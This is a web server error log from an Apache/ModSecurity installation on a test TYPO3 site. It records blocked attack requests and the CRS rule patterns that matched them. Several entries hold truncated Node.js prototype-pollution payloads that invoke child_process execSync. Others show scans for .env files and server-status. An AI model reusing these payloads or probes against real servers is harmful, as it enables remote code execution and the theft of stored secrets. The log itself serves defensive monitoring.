[Fri Jan 23 03:37:20.986866 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
[Fri Jan 23 03:37:20.988689 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Rule 7fc3201c6320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
[Fri Jan 23 03:37:20.988833 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Rule 7fc3201bd030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
[Fri Jan 23 03:37:20.995089 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
[Fri Jan 23 03:37:20.995246 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
[Fri Jan 23 07:11:39.986451 2026] [:error] [pid 1596305] [client 44.218.16.110:39392] [client 44.218.16.110] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${encodeuricomponent(string(res))} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(uname -m).tostring() })() throw object.assign(..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXMRG9QNWLaY5yErJgchiQAAAAM"]
[Fri Jan 23 07:11:39.986874 2026] [:error] [pid 1596305] [client 44.218.16.110:39392] [client 44.218.16.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXMRG9QNWLaY5yErJgchiQAAAAM"]
[Fri Jan 23 07:11:39.988250 2026] [:error] [pid 1596305] [client 44.218.16.110:39392] [client 44.218.16.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXMRG9QNWLaY5yErJgchiQAAAAM"]
[Fri Jan 23 07:11:39.988403 2026] [:error] [pid 1596305] [client 44.218.16.110:39392] [client 44.218.16.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXMRG9QNWLaY5yErJgchiQAAAAM"]
[Fri Jan 23 07:11:40.459296 2026] [:error] [pid 1596308] [client 44.218.16.110:21128] [client 44.218.16.110] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((6 7))test).tostring() })() throw object.assign(new error(next_redirect) {digest:`next_redirect push/x?d=${encodeuricomponent(string(res)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(echo ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXMRHMenwX3GmuUsFcV-SgAAAAU"]
[Fri Jan 23 07:11:40.459655 2026] [:error] [pid 1596308] [client 44.218.16.110:21128] [client 44.218.16.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXMRHMenwX3GmuUsFcV-SgAAAAU"]
[Fri Jan 23 07:11:40.459708 2026] [:error] [pid 1596308] [client 44.218.16.110:21128] [client 44.218.16.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6 7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXMRHMenwX3GmuUsFcV-SgAAAAU"]
[Fri Jan 23 07:11:40.461012 2026] [:error] [pid 1596308] [client 44.218.16.110:21128] [client 44.218.16.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXMRHMenwX3GmuUsFcV-SgAAAAU"]
[Fri Jan 23 07:11:40.461219 2026] [:error] [pid 1596308] [client 44.218.16.110:21128] [client 44.218.16.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXMRHMenwX3GmuUsFcV-SgAAAAU"]
[Sun Jan 25 14:35:08.346755 2026] [:error] [pid 1648533] [client 185.177.72.60:12596] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aXYcDGtr0vdTg8NmRVDMVgAAAAk"]
[Sun Jan 25 14:35:08.348090 2026] [:error] [pid 1648533] [client 185.177.72.60:12596] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aXYcDGtr0vdTg8NmRVDMVgAAAAk"]
[Sun Jan 25 14:35:08.348267 2026] [:error] [pid 1648533] [client 185.177.72.60:12596] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aXYcDGtr0vdTg8NmRVDMVgAAAAk"]
[Sun Jan 25 14:35:08.349071 2026] [authz_core:error] [pid 1642091] [client 185.177.72.60:12618] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sun Jan 25 14:35:08.351454 2026] [:error] [pid 1639914] [client 185.177.72.60:12652] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXYcDOGbQU28xhMFmbpuGgAAAAI"]
[Sun Jan 25 14:35:08.351658 2026] [:error] [pid 1639914] [client 185.177.72.60:12652] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXYcDOGbQU28xhMFmbpuGgAAAAI"]
[Sun Jan 25 14:35:08.351802 2026] [:error] [pid 1639914] [client 185.177.72.60:12652] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXYcDOGbQU28xhMFmbpuGgAAAAI"]
[Sun Jan 25 14:35:08.353175 2026] [:error] [pid 1639915] [client 185.177.72.60:12644] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aXYcDBEfH696a65liSMzfwAAAAM"]
[Sun Jan 25 14:35:08.353371 2026] [:error] [pid 1639915] [client 185.177.72.60:12644] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aXYcDBEfH696a65liSMzfwAAAAM"]
[Sun Jan 25 14:35:08.353543 2026] [:error] [pid 1639915] [client 185.177.72.60:12644] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aXYcDBEfH696a65liSMzfwAAAAM"]
[Sun Jan 25 14:35:08.367035 2026] [authz_core:error] [pid 1639913] [client 185.177.72.60:12678] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sun Jan 25 15:13:16.774638 2026] [authz_core:error] [pid 1648532] [client 185.177.72.60:40330] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sun Jan 25 15:13:16.775311 2026] [authz_core:error] [pid 1639914] [client 185.177.72.60:40296] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sun Jan 25 15:13:16.787556 2026] [:error] [pid 1642091] [client 185.177.72.60:40300] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXYk_DcZub3joMWxbofdlgAAAAY"]
[Sun Jan 25 15:13:16.794453 2026] [:error] [pid 1642091] [client 185.177.72.60:40300] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXYk_DcZub3joMWxbofdlgAAAAY"]
[Sun Jan 25 15:13:16.794612 2026] [:error] [pid 1642091] [client 185.177.72.60:40300] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXYk_DcZub3joMWxbofdlgAAAAY"]
[Sun Jan 25 15:13:18.925821 2026] [:error] [pid 1642091] [client 185.177.72.60:40608] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aXYk_jcZub3joMWxbofdlwAAAAY"]
[Sun Jan 25 15:13:18.926174 2026] [:error] [pid 1642091] [client 185.177.72.60:40608] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aXYk_jcZub3joMWxbofdlwAAAAY"]
[Sun Jan 25 15:13:18.926333 2026] [:error] [pid 1642091] [client 185.177.72.60:40608] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aXYk_jcZub3joMWxbofdlwAAAAY"]
[Sun Jan 25 15:13:19.816054 2026] [authz_core:error] [pid 1639912] [client 185.177.72.60:40600] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/include
[Sun Jan 25 15:13:19.817052 2026] [:error] [pid 1648091] [client 185.177.72.60:40566] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aXYk_zyzEOnrN9sTr1SV_QAAAAo"]
[Sun Jan 25 15:13:19.817294 2026] [:error] [pid 1648091] [client 185.177.72.60:40566] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aXYk_zyzEOnrN9sTr1SV_QAAAAo"]
[Sun Jan 25 15:13:19.817463 2026] [:error] [pid 1648091] [client 185.177.72.60:40566] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aXYk_zyzEOnrN9sTr1SV_QAAAAo"]
[Sun Jan 25 15:13:19.817733 2026] [:error] [pid 1639915] [client 185.177.72.60:40584] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXYk_xEfH696a65liSMzhAAAAAM"]
[Sun Jan 25 15:13:19.817945 2026] [:error] [pid 1639915] [client 185.177.72.60:40584] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXYk_xEfH696a65liSMzhAAAAAM"]
[Sun Jan 25 15:13:19.818084 2026] [:error] [pid 1639915] [client 185.177.72.60:40584] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXYk_xEfH696a65liSMzhAAAAAM"]
